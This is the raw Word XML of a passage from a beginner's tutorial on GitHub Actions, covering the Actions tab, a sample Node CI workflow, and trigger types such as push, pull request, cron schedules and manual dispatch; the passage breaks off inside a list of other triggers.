    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Before you write any more workflows, spend two minutes getting familiar with the Actions tab. You'll spend a lot of time here.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Left sidebar</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> lists your workflows — one entry per YAML file. Click one to filter runs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Main pane</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> is the list of runs. Each row shows the event that triggered it, the branch, the commit, and the status (green check, red X, yellow dot).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Click a run</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> and you see the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">job graph</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> — boxes connected by arrows, matching your </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">needs:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> structure.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Click a job</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> and you see its steps with collapsible logs. Red = this step failed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Top right</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> has the "Re-run all jobs" and "Re-run failed jobs" buttons. The second one is faster and keeps artifacts from the successful jobs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Summary tab</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> shows high-level status, artifact download links, and billable minutes for this run.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Artifacts</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> sit at the bottom of the Summary tab and stick around for 90 days by default.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>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5. Reading a real workflow file</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">The hello world above is too small to be educational. Here's something closer to what you'll see in a real repo, broken down key by key.</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CI</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pull_request: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NODE_VERSION: '20'</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Checkout code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Set up Node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actions/setup-node@v4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 ${{ env.NODE_VERSION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Install dependencies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npm ci</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Run tests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npm test</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What every piece does</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">`name`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> — the friendly name shown in the Actions tab. Optional, but your future self will thank you.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">`on`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> — the trigger. Here, the workflow runs on any push or PR targeting </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">main</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">`env`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> — environment variables, available to every job and step in this file. You can also set them per-job or per-step if you want tighter scope.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">`jobs`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> — the jobs in this workflow. Each key under </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">jobs:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> (like </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">test</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">) is a job ID.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">`runs-on`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> — which runner to use. Common choices: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">ubuntu-latest</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">macos-latest</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">windows-latest</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">`uses`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> — calls a pre-built action. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">actions/checkout@v4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> clones your repo. You'll use this one in nearly every workflow.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">`with`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> — arguments for the action you're calling.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">`run`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> — just runs a shell command directly.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">That's all the top-level syntax in a real workflow. Everything else is variations.</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6. Triggers — when things run</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">on:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> key decides what causes your workflow to fire. Here are the ones you'll reach for most often.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Push and pull request</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">The workhorse pair:</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 develop]</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paths: ['src/**']           # only when files under src/ change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pull_request:</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Schedule (cron)</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schedule:</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cron: '0 0 * * *'         # every day at midnight UTC</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">The cron format is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">minute hour day-of-month month day-of-week</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">. If you haven't written cron in a while, </w:t>
      </w:r>
      <w:hyperlink w:history="1" r:id="rIdg8ikodevy-7t4azbauj62">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
            <w:color w:val="2E75B6"/>
            <w:u w:val="single" w:color="2E75B6"/>
          </w:rPr>
          <w:t xml:space="preserve">crontab.guru</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> is great for building expressions without breaking anything.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">One gotcha: GitHub schedules are UTC, not your local timezone. Adjust accordingly.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Manual trigger</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Sometimes you want a button. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">workflow_dispatch</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> gives you one: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workflow_dispatch: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inputs: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environment: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description: 'Where to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required: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default: 'staging'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type: choice</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options: [staging, production]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">You'll get a "Run workflow" button in the Actions tab, with a dropdown for </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">environment</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">. Grab it inside your workflow as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">${{ inputs.environment }}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Others worth knowing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">issues</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> — an issue was opened, edited, or closed</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">issue_comment</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> — someone commented on an issue or PR</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">release</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> — a release got published</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
